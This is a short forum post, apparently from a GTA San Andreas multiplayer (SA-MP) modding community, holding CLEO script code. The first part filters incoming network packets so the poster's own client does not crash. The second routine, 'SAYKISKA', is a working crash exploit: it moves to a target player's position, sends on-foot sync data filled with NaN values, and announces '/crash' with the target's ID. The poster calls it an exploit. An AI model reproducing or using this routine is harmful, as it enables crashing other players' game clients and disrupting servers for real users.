02.09.2018, 10:22 
	
	
	PHP код:
:RPC_INCOMING
0BE5: raknet 8@ = get_hook_param PARAM_PACKETID
IF 0039:   8@ == 19
    THEN
    0BE5: raknet 8@ = get_hook_param PARAM_BITSTREAM
    0BE9: raknet bit_stream 8@ reset_read_pointer
    0BE7: raknet 16@ = bit_stream_read 8@ type BS_TYPE_FLOAT
    IF 0039:   16@ == 2143289344
        THEN
        0BE0: raknet hook_ret FALSE
    END
    0BE9: raknet bit_stream 8@ reset_read_pointer
END
IF 0039:   8@ == 86
    THEN
    0BE5: raknet 8@ = get_hook_param PARAM_BITSTREAM
    0BE9: raknet bit_stream 8@ reset_read_pointer
    0BE7: raknet 9@ = bit_stream_read 8@ type BS_TYPE_SHORT // WORD (PLAYER ID)
    0B2B: samp 10@ = get_player_id_by_actor_handle $PLAYER_ACTOR   
    IF 003B:   10@ == 9@
        THEN
        0BE7: raknet 11@ = bit_stream_read 8@ type BS_TYPE_BYTE // animlib[strlen]
        0BE8: raknet bit_stream 8@ read_array 12@ size 11@ // animlib[char]
        0C1E: array 12@ element 11@ el_size 1 = 0
        0BE7: raknet 13@ = bit_stream_read 8@ type BS_TYPE_BYTE // animname[strlen]
        0BE8: raknet bit_stream 8@ read_array 14@ size 13@ // animname[char]
        0C1E: array 14@ element 13@ el_size 1 = 0
        0B59: samp 15@ = animation_id_by_name 14@ file 12@
        IF OR
        0039:   15@ == 37
        0039:   15@ == 39
        0039:   15@ == 589
            THEN
            0BE0: raknet hook_ret FALSE
        END
    END
    0BE9: raknet bit_stream 8@ reset_read_pointer
END
0BE0: raknet hook_ret TRUE
END
0B43: samp cmd_ret
:SAYKISKA // 0AB1: call_scm_func @SAYKISKA 1 | ID |
0B20: samp 1@ = actor_handle_by_samp_player_id 0@
00A0: store_actor 1@ position_to 2@ 3@ 4@
0B2B: samp 5@ = get_player_id_by_actor_handle $PLAYER_ACTOR
0AC8: 6@ = allocate_memory_size 68
0BBA: samp store_player 5@ onfoot_data 6@
0C0D: struct 6@ offset 6 size 4 = 2@
0C0D: struct 6@ offset 10 size 4 = 3@
0C0D: struct 6@ offset 14 size 4 = 4@
0C0D: struct 6@ offset 18 size 4 = 0x07fc00000
0C0D: struct 6@ offset 22 size 4 = 0x07fc00000
0C0D: struct 6@ offset 26 size 4 = 0x07fc00000
0BC0: samp send_onfoot_data 6@
0AF9: samp say_msg "/crash %d" 0@
0C83: samp force_onfoot_sync
0AC9: free_allocated_memory 6@        
0AB2: ret 0 



. Also an exploit it is, but a fix would be worth taking the risk. Maybe this will all end up in a client update.. And that'd be good!